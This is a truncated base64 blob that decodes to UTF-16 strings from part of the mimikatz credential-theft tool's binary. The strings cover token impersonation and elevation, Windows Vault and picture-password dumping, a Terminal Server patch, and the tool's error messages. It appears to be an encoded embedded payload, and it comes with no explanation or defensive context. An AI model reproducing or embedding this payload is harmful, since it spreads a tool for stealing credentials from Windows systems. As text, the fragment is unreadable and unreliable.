RQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAGcAZQB0AEwAZABhAHAAQQBuAGQAUgBvAG8AdABEAE4AIAA7ACAAbABkAGEAcABfAGIAaQBuAGQAXwBzACAAMAB4ACUAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZwBlAHQATABkAGEAcABBAG4AZABSAG8AbwB0AEQATgAgADsAIABsAGQAYQBwAF8AaQBuAGkAdAAKAAAAAAByAG8AbwB0AEQAbwBtAGEAaQBuAE4AYQBtAGkAbgBnAEMAbwBuAHQAZQB4AHQAAAAoAGQAbgA9AFIAbwBvAHQARABTAEUAKQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwBpAGQAXwBnAGUAdABSAG8AbwB0AEQAbwBtAGEAaQBuAE4AYQBtAGkAbgBnAEMAbwBuAHQAZQB4AHQAIAA7ACAAbABkAGEAcABfAGcAZQB0AF8AdgBhAGwAdQBlAHMAXwBsAGUAbgAgAGkAcwAgAE4ATwBUACAAMQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAaQBkAF8AZwBlAHQAUgBvAG8AdABEAG8AbQBhAGkAbgBOAGEAbQBpAG4AZwBDAG8AbgB0AGUAeAB0ACAAOwAgAGwAZABhAHAAXwBjAG8AdQBuAHQAXwBlAG4AdAByAGkAZQBzACAAaQBzACAATgBPAFQAIAAxAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAGkAZABfAGcAZQB0AFIAbwBvAHQARABvAG0AYQBpAG4ATgBhAG0AaQBuAGcAQwBvAG4AdABlAHgAdAAgADsAIABsAGQAYQBwAF8AcwBlAGEAcgBjAGgAXwBzACAAMAB4ACUAeAAgACgAJQB1ACkACgAAAAAAZQB4AGkAdAAAAAAAAAAAAFEAdQBpAHQAIABtAGkAbQBpAGsAYQB0AHoAAAAAAAAAYwBsAHMAAAAAAAAAAAAAAEMAbABlAGEAcgAgAHMAYwByAGUAZQBuACAAKABkAG8AZQBzAG4AJwB0ACAAdwBvAHIAawAgAHcAaQB0AGgAIAByAGUAZABpAHIAZQBjAHQAaQBvAG4AcwAsACAAbABpAGsAZQAgAFAAcwBFAHgAZQBjACkAAAAAAGEAbgBzAHcAZQByAAAAAAAAAAAAAAAAAEEAbgBzAHcAZQByACAAdABvACAAdABoAGUAIABVAGwAdABpAG0AYQB0AGUAIABRAHUAZQBzAHQAaQBvAG4AIABvAGYAIABMAGkAZgBlACwAIAB0AGgAZQAgAFUAbgBpAHYAZQByAHMAZQAsACAAYQBuAGQAIABFAHYAZQByAHkAdABoAGkAbgBnAAAAAAAAAGMAbwBmAGYAZQBlAAAAAABQAGwAZQBhAHMAZQAsACAAbQBhAGsAZQAgAG0AZQAgAGEAIABjAG8AZgBmAGUAZQAhAAAAAAAAAHMAbABlAGUAcAAAAAAAAAAAAAAAAAAAAFMAbABlAGUAcAAgAGEAbgAgAGEAbQBvAHUAbgB0ACAAbwBmACAAbQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAAABMAG8AZwAgAG0AaQBtAGkAawBhAHQAegAgAGkAbgBwAHUAdAAvAG8AdQB0AHAAdQB0ACAAdABvACAAZgBpAGwAZQAAAAAAAABiAGEAcwBlADYANAAAAAAAAAAAAAAAAABTAHcAaQB0AGMAaAAgAGYAaQBsAGUAIABvAHUAdABwAHUAdAAvAGIAYQBzAGUANgA0ACAAbwB1AHQAcAB1AHQAAAAAAAAAAAB2AGUAcgBzAGkAbwBuAAAAAAAAAAAAAABEAGkAcwBwAGwAYQB5ACAAcwBvAG0AZQAgAHYAZQByAHMAaQBvAG4AIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwAAAGMAZAAAAAAAAAAAAEMAaABhAG4AZwBlACAAbwByACAAZABpAHMAcABsAGEAeQAgAGMAdQByAHIAZQBuAHQAIABkAGkAcgBlAGMAdABvAHIAeQAAAGwAbwBjAGEAbAB0AGkAbQBlAAAAAAAAAEQAaQBzAHAAbABhAHkAcwAgAHMAeQBzAHQAZQBtACAAbABvAGMAYQBsACAAZABhAHQAZQAgAGEAbgBkACAAdABpAG0AZQAgACgATwBKACAAYwBvAG0AbQBhAG4AZAApAAAAAAAAAAAAcwB0AGEAbgBkAGEAcgBkAAAAAAAAAAAAUwB0AGEAbgBkAGEAcgBkACAAbQBvAGQAdQBsAGUAAABCAGEAcwBpAGMAIABjAG8AbQBtAGEAbgBkAHMAIAAoAGQAbwBlAHMAIABuAG8AdAAgAHIAZQBxAHUAaQByAGUAIABtAG8AZAB1AGwAZQAgAG4AYQBtAGUAKQAAAAAAAABCAHkAZQAhAAoAAAAAAAAANAAyAC4ACgAAAAAAAAAAAAoAIAAgACAAIAAoACAAKAAKACAAIAAgACAAIAApACAAKQAKACAAIAAuAF8AXwBfAF8AXwBfAC4ACgAgACAAfAAgACAAIAAgACAAIAB8AF0ACgAgACAAXAAgACAAIAAgACAAIAAvAAoAIAAgACAAYAAtAC0ALQAtACcACgAAAAAAUwBsAGUAZQBwACAAOgAgACUAdQAgAG0AcwAuAC4ALgAgAAAAAAAAAEUAbgBkACAAIQAKAAAAAABtAGkAbQBpAGsAYQB0AHoALgBsAG8AZwAAAAAAAAAAAFUAcwBpAG4AZwAgACcAJQBzACcAIABmAG8AcgAgAGwAbwBnAGYAaQBsAGUAIAA6ACAAJQBzAAoAAAAAAAAAAABmAGEAbABzAGUAAAAAAAAAaQBzAEIAYQBzAGUANgA0AEkAbgB0AGUAcgBjAGUAcAB0ACAAdwBhAHMAIAAgACAAIAA6ACAAJQBzAAoAAAAAAGkAcwBCAGEAcwBlADYANABJAG4AdABlAHIAYwBlAHAAdAAgAGkAcwAgAG4AbwB3ACAAOgAgACUAcwAKAAAAAAA2ADQAAAAAAAoAbQBpAG0AaQBrAGEAdAB6ACAAMgAuADEAIAAoAGEAcgBjAGgAIAB4ADYANAApAAoAVwBpAG4AZABvAHcAcwAgAE4AVAAgACUAdQAuACUAdQAgAGIAdQBpAGwAZAAgACUAdQAgACgAYQByAGMAaAAgAHgAJQBzACkACgBtAHMAdgBjACAAJQB1ACAAJQB1AAoAAAAAAAAAQwB1AHIAOgAgAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHQAYQBuAGQAYQByAGQAXwBjAGQAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AZwBlAHQAQwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAATgBlAHcAOgAgACUAcwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAdABhAG4AZABhAHIAZABfAGMAZAAgADsAIABTAGUAdABDAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABMAG8AYwBhAGwAOgAgAAAAWgBvAG4AZQAgADoAIAAlAC4AMwAyAHMACgAAAAAAAABVAFQAQwAgACAAOgAgAAAATABpAHMAdAAgAC4ALgAuAAAAAAAAAAAAZwBlAHQAAABHAGUAdAAgAC4ALgAuAAAAcwBlAHQAAABTAGUAdAAgAC4ALgAuAAAAZABlAGwAAABEAGUAbAAgAC4ALgAuAAAAAAAAAAAAAABTAHkAcwB0AGUAbQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAFYAYQBsAHUAZQAgAG0AbwBkAHUAbABlAAAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHMACgBWAGUAbgBkAG8AcgAgAEcAVQBJAEQAOgAgAAAAAAAAACkACgBMAGUAbgBnAHQAaAAgACAAIAAgACAAOgAgACUAdQAKAEQAYQB0AGEAIAAgACAAIAAgACAAIAA6ACAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AbABpAHMAdAAgADsAIABOAHQARQBuAHUAbQBlAHIAYQB0AGUAUwB5AHMAdABlAG0ARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQBsAHUAZQBzAEUAeAAoAGQAYQB0AGEAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGwAaQBzAHQAIAA7ACAATgB0AEUAbgB1AG0AZQByAGEAdABlAFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUAcwBFAHgAKABzAGkAegBlACkAOgAgADAAeAAlADAAOAB4AAoAAAAAAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA6ACAAJQAwADgAeAAgACgAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcwB5AHMAZQBuAHYAXwBnAGUAdAAgADsAIABOAHQAUQB1AGUAcgB5AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZwBlAHQAIAA7ACAAUwB5AHMAdABlAG0AIABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAIABWAGEAcgBpAGEAYgBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AZwBlAHQAIAA7ACAATgB0AFEAdQBlAHIAeQBTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAEUAeAAoAHMAaQB6AGUAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGcAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAHsAYgAxADYAYgAwADAAYgA1AC0AYwBhAGYAZQAtAGIAYQBiAGUALQAwAGUAZQAwAC0AZABhAGIAYQBkAGEAYgBhAGQAMAAwADAAfQAAAAAANAAxADAAMAAyADAAMAAwADQAYwAwADAANgAxADAAMAAyADAAMAAwADUANgAwADAANgA5ADAAMAA2ADUAMAAwADIAYwAwADAAMgAwADAAMAA0ADEAMAAwADIAMAAwADAANABjADAAMAAyADcAMAAwADQAMQAwADAANgBkADAAMAA2AGYAMAAwADcANQAwADAANwAyADAAMAAwADAAMAAwAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AcwBlAHQAIAA7ACAATgB0AFMAZQB0AFMAeQBzAHQAZQBtAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABWAGEAbAB1AGUARQB4ACgAZABhAHQAYQApADoAIAAwAHgAJQAwADgAeAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHMAeQBzAGUAbgB2AF8AcwBlAHQAIAA7ACAAUgB0AGwARwBVAEkARABGAHIAbwBtAFMAdAByAGkAbgBnADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGQAZQBsACAAOwAgAFMAeQBzAHQAZQBtACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAVgBhAHIAaQBhAGIAbABlACAAbgBvAHQAIABmAG8AdQBuAGQALgAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGQAZQBsACAAOwAgAE4AdABTAGUAdABTAHkAcwB0AGUAbQBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAGwAdQBlAEUAeAAoAGQAYQB0AGEAKQA6ACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBzAHkAcwBlAG4AdgBfAGQAZQBsACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAE4ATwBOAF8AVgBPAEwAQQBUAEkATABFAAAAAAAAAAAAQgBPAE8AVABTAEUAUgBWAEkAQwBFAF8AQQBDAEMARQBTAFMAAAAAAFIAVQBOAFQASQBNAEUAXwBBAEMAQwBFAFMAUwAAAAAASABBAFIARABXAEEAUgBFAF8ARQBSAFIATwBSAF8AUgBFAEMATwBSAEQAAAAAAAAAQQBVAFQASABFAE4AVABJAEMAQQBUAEUARABfAFcAUgBJAFQARQBfAEEAQwBDAEUAUwBTAAAAAABUAEkATQBFAF8AQgBBAFMARQBEAF8AQQBVAFQASABFAE4AVABJAEMAQQBUAEUARABfAFcAUgBJAFQARQBfAEEAQwBDAEUAUwBTAAAAAAAAAEEAUABQAEUATgBEAF8AVwBSAEkAVABFAAAAAAAAAAAASwBpAHcAaQBFAGYAaQBWAGEAcgBpAGEAYgBsAGUAcwAAAAAAAAAAAEUAZgBpAEIAbwBvAHQAVgBhAHIAaQBhAGIAbABlAHMAAAAAAAAAAABFAHgAcABTAGUAYwB1AHIAZQBCAG8AbwB0AFYAZQBuAGQAbwByAAAAJQBzACAALQAgAAAAAAAAAHcAaABvAGEAbQBpAAAAAABEAGkAcwBwAGwAYQB5ACAAYwB1AHIAcgBlAG4AdAAgAGkAZABlAG4AdABpAHQAeQAAAAAAAAAAAEwAaQBzAHQAIABhAGwAbAAgAHQAbwBrAGUAbgBzACAAbwBmACAAdABoAGUAIABzAHkAcwB0AGUAbQAAAAAAAABlAGwAZQB2AGEAdABlAAAASQBtAHAAZQByAHMAbwBuAGEAdABlACAAYQAgAHQAbwBrAGUAbgAAAHIAZQB2AGUAcgB0AAAAAABSAGUAdgBlAHIAdAAgAHQAbwAgAHAAcgBvAGMAZQBzACAAdABvAGsAZQBuAAAAAAB0AG8AawBlAG4AAAAAAAAAVABvAGsAZQBuACAAbQBhAG4AaQBwAHUAbABhAHQAaQBvAG4AIABtAG8AZAB1AGwAZQAAAAAAAAAgACoAIABQAHIAbwBjAGUAcwBzACAAVABvAGsAZQBuACAAOgAgAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAHcAaABvAGEAbQBpACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAIAAqACAAVABoAHIAZQBhAGQAIABUAG8AawBlAG4AIAAgADoAIAAAAG4AbwAgAHQAbwBrAGUAbgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AdwBoAG8AYQBtAGkAIAA7ACAATwBwAGUAbgBUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABkAG8AbQBhAGkAbgBhAGQAbQBpAG4AAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBnAGUAdABDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAFMASQBEACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAATgBvACAAdQBzAGUAcgBuAGEAbQBlACAAYQB2AGEAaQBsAGEAYgBsAGUAIAB3AGgAZQBuACAAUwBZAFMAVABFAE0ACgAAAFQAbwBrAGUAbgAgAEkAZAAgACAAOgAgACUAdQAKAFUAcwBlAHIAIABuAGEAbQBlACAAOgAgACUAcwAKAFMASQBEACAAbgBhAG0AZQAgACAAOgAgAAAAAAAlAHMAXAAlAHMACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlACAAOwAgAGsAdQBsAGwAXwBtAF8AdABvAGsAZQBuAF8AZwBlAHQATgBhAG0AZQBEAG8AbQBhAGkAbgBGAHIAbwBtAFMASQBEACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AbABpAHMAdABfAG8AcgBfAGUAbABlAHYAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBsAG8AYwBhAGwAXwBkAG8AbQBhAGkAbgBfAHUAcwBlAHIAXwBDAHIAZQBhAHQAZQBXAGUAbABsAEsAbgBvAHcAbgBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdABvAGsAZQBuAF8AcgBlAHYAZQByAHQAIAA7ACAAUwBlAHQAVABoAHIAZQBhAGQAVABvAGsAZQBuACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABBAG4AbwBuAHkAbQBvAHUAcwAAAAAAAABJAGQAZQBuAHQAaQBmAGkAYwBhAHQAaQBvAG4AAAAAAEkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4AAAAAAAAARABlAGwAZQBnAGEAdABpAG8AbgAAAAAAJQAtADEAMAB1AAkAAAAAACUAcwBcACUAcwAJACUAcwAAAAAAAAAAAAkAKAAlADAAMgB1AGcALAAlADAAMgB1AHAAKQAJACUAcwAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHQAbwBrAGUAbgBfAGwAaQBzAHQAXwBvAHIAXwBlAGwAZQB2AGEAdABlAF8AYwBhAGwAbABiAGEAYwBrACAAOwAgAEMAaABlAGMAawBUAG8AawBlAG4ATQBlAG0AYgBlAHIAcwBoAGkAcAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAJQB1AAkAAAAgAC0APgAgAEkAbQBwAGUAcgBzAG8AbgBhAHQAZQBkACAAIQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB0AG8AawBlAG4AXwBsAGkAcwB0AF8AbwByAF8AZQBsAGUAdgBhAHQAZQBfAGMAYQBsAGwAYgBhAGMAawAgADsAIABTAGUAdABUAGgAcgBlAGEAZABUAG8AawBlAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAbQB1AGwAdABpAHIAZABwAAAAAAAAAAAAAAAAAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABwAGEAdABjAGgAIABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAgAHMAZQByAHYAaQBjAGUAIAB0AG8AIABhAGwAbABvAHcAIABtAHUAbAB0AGkAcABsAGUAcwAgAHUAcwBlAHIAcwAAAHQAcwAAAAAAAAAAAFQAZQByAG0AaQBuAGEAbAAgAFMAZQByAHYAZQByACAAbQBvAGQAdQBsAGUAAAAAAHQAZQByAG0AcwByAHYALgBkAGwAbAAAAFQAZQByAG0AUwBlAHIAdgBpAGMAZQAAAAAAAAAAAAAAVwBpAG4AZABvAHcAcwAgAFYAYQB1AGwAdAAvAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABtAG8AZAB1AGwAZQAAAHYAYQB1AGwAdABjAGwAaQAAAAAAAAAAAFZhdWx0RW51bWVyYXRlSXRlbVR5cGVzAFZhdWx0RW51bWVyYXRlVmF1bHRzAAAAAFZhdWx0T3BlblZhdWx0AABWYXVsdEdldEluZm9ybWF0aW9uAAAAAABWYXVsdEVudW1lcmF0ZUl0ZW1zAAAAAABWYXVsdENsb3NlVmF1bHQAVmF1bHRGcmVlAAAAAAAAAFZhdWx0R2V0SXRlbQAAAABEAG8AbQBhAGkAbgAgAFAAYQBzAHMAdwBvAHIAZAAAAEQAbwBtAGEAaQBuACAAQwBlAHIAdABpAGYAaQBjAGEAdABlAAAAAABEAG8AbQBhAGkAbgAgAEUAeAB0AGUAbgBkAGUAZAAAAFAAaQBuACAATABvAGcAbwBuAAAAAAAAAFAAaQBjAHQAdQByAGUAIABQAGEAcwBzAHcAbwByAGQAAAAAAAAAAABCAGkAbwBtAGUAdAByAGkAYwAAAAAAAABOAGUAeAB0ACAARwBlAG4AZQByAGEAdABpAG8AbgAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAAAAAAAoAVgBhAHUAbAB0ACAAOgAgAAAAAAAAAAkASQB0AGUAbQBzACAAKAAlAHUAKQAKAAAAAAAAAAAACQAgACUAMgB1AC4ACQAlAHMACgAAAAAACQAJAFQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAACQAJAEwAYQBzAHQAVwByAGkAdAB0AGUAbgAgACAAIAAgACAAOgAgAAAAAAAAAAAACQAJAEYAbABhAGcAcwAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAAAAAAAJAAkAUgBlAHMAcwBvAHUAcgBjAGUAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAJAAkASQBkAGUAbgB0AGkAdAB5ACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAAAAJAAkAQQB1AHQAaABlAG4AdABpAGMAYQB0AG8AcgAgACAAIAA6ACAAAAAAAAAAAAAJAAkAUAByAG8AcABlAHIAdAB5ACAAJQAyAHUAIAAgACAAIAAgADoAIAAAAAAAAAAJAAkAKgBBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByACoAIAA6ACAAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA3ACAAOgAgACUAMAA4AHgAAAAAAAkACQBQAGEAYwBrAGEAZwBlAFMAaQBkACAAIAAgACAAIAAgADoAIAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdAAgADsAIABWAGEAdQBsAHQARwBlAHQASQB0AGUAbQA4ACAAOgAgACUAMAA4AHgAAAAAAAoACQAJACoAKgAqACAAJQBzACAAKgAqACoACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0ACAAOwAgAFYAYQB1AGwAdABFAG4AdQBtAGUAcgBhAHQAZQBWAGEAdQBsAHQAcwAgADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAACQAJAFUAcwBlAHIAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAAJQBzAFwAJQBzAAAAAAAAAAAAAAAAAAAAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFwATABvAGcAbwBuAFUASQBcAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAAAAAAAAAAAAYgBnAFAAYQB0AGgAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIAAyACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAMQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGwAaQBzAHQAXwBkAGUAcwBjAEkAdABlAG0AXwBQAEkATgBMAG8AZwBvAG4ATwByAFAAaQBjAHQAdQByAGUAUABhAHMAcwB3AG8AcgBkAE8AcgBCAGkAbwBtAGUAdAByAGkAYwAgADsAIABSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAFMASQBEACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBsAGkAcwB0AF8AZABlAHMAYwBJAHQAZQBtAF8AUABJAE4ATABvAGcAbwBuAE8AcgBQAGkAYwB0AHUAcgBlAFAAYQBzAHMAdwBvAHIAZABPAHIAQgBpAG8AbQBlAHQAcgBpAGMAIAA7ACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AdgBhAHUAbAB0AF8AbABpAHMAdABfAGQAZQBzAGMASQB0AGUAbQBfAFAASQBOAEwAbwBnAG8AbgBPAHIAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQATwByAEIAaQBvAG0AZQB0AHIAaQBjACAAOwAgAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUABpAGMAdAB1AHIAZQBQAGEAcwBzAHcAbwByAGQAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAACQAJAFAAYQBzAHMAdwBvAHIAZAAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAAAAAACQAJAFAASQBOACAAQwBvAGQAZQAgACAAIAAgACAAIAAgACAAOgAgACUAMAA0AGgAdQAKAAAAAAAJAAkAQgBhAGMAawBnAHIAbwB1AG4AZAAgAHAAYQB0AGgAIAA6ACAAJQBzAAoAAAAAAAAAAAAAAAkACQBQAGkAYwB0AHUAcgBlACAAcABhAHMAcwB3AG8AcgBkACAAKABnAHIAaQBkACAAaQBzACAAMQA1ADAAKgAxADAAMAApAAoAAAAAAAAACQAJACAAWwAlAHUAXQAgAAAAAAAAAAAAcABvAGkAbgB0ACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApAAAAAABjAGwAbwBjAGsAdwBpAHMAZQAAAAAAAABhAG4AdABpAGMAbABvAGMAawB3AGkAcwBlAAAAAAAAAAAAAAAAAAAAYwBpAHIAYwBsAGUAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQAgADsAIAByACAAPQAgACUAMwB1ACkAIAAtACAAJQBzAAAAAAAAAAAAAAAAAAAAbABpAG4AZQAgACAAIAAoAHgAIAA9ACAAJQAzAHUAIAA7ACAAeQAgAD0AIAAlADMAdQApACAALQA+ACAAKAB4ACAAPQAgACUAMwB1ACAAOwAgAHkAIAA9ACAAJQAzAHUAKQAAAAAAAAAlAHUACgAAAAkACQBQAHIAbwBwAGUAcgB0AHkAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAAACUALgAqAHMAXAAAAAAAAAB0AG8AZABvACAAPwAKAAAACQBOAGEAbQBlACAAIAAgACAAIAAgACAAOgAgACUAcwAKAAAAAAAAAHQAZQBtAHAAIAB2AGEAdQBsAHQAAAAAAAkAUABhAHQAaAAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAAABbAFUAUwBIAE8AUgBUAF0AIAAlAGgAdQAAAAAAAAAAAFsARABXAE8AUgBEAF0AIAAlAHUAAAAAAFsAUwBUAFIASQBOAEcAXQAgACUAcwAAAFsAQgBZAFQARQAqAF0AIAAAAAAAAAAAAFsAUwBJAEQAXQAgAAAAAABbAEEAVABUAFIASQBCAFUAVABFAF0ACgAAAAAAAAAAAAkACQAgACAARgBsAGEAZwBzACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAACQAJACAAIABLAGUAeQB3AG8AcgBkACAAOgAgACUAcwAKAAAAAAAAAAkACQAgACAAVgBhAGwAdQBlACAAIAAgADoAIAAAAAAAWwBUAHkAcABlACAAJQAyAHUAXQAgAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHYAYQB1AGwAdABfAGMAcgBlAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwB2AGEAdQBsAHQAXwBjAH